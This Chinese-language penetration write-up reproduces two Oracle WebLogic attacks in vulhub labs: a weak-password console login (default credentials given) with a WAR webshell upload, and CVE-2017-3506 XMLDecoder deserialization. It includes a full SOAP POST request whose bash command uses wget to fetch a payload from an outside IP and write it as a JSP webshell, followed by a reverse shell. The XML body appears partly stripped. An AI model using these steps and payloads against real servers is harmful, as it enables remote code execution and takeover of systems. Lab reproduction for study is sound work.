后台弱?令GetShell

漏洞描述

通过弱?令进?后台界? , 上传部署war包 , getshell

影响范围

全版本（前提后台存在弱?令）

环境搭建

cd vulhub/weblogic/weak_password
docker-compose up -d

漏洞复现

默认账号密码：weblogic/Oracle@123 (单个账号错误密码5次之后就会?动锁定) 123.57.211.129 :7001/console/login/LoginForm.jsp 1.登录后台后，点击部署，点击安装，点击上传?件。 2.上传war包，jsp??压缩成zip，修改后缀为war，上传 然后?直下?步 3.访问部署好的war 123.57.211.129 :7001/shell/shell.jsp 哥斯拉连接测试 完成

CVE-2017-3506——XMLDecoder反序列化漏洞

漏洞描述

Weblogic的WLS Security组件对外提供了webserver服务，其中使?了XMLDecoder来解析?户输?的 XML数据，在解析过程中出现反序列化漏洞，可导致任意命令执?。

影响版本

受影响版本：WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。

环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

访问以下?录中的?种，有回显如下图可以判断wls-wsat组件存在 /wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11 1.验证是否存在wls-wsat组件 http://123.57.211.129:7001/wls-wsat/CoordinatorPortType 存在 2.在当前??抓包之后，添加下?请求包，反弹shell。

POST /_async/AsyncResponseService HTTP/1.1
Host: 123.57.211.129:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 839
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml



xx
xx




/bin/bash


-c


wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp

发送到重放器重复 在本机监听自己的6666端口，反弹成功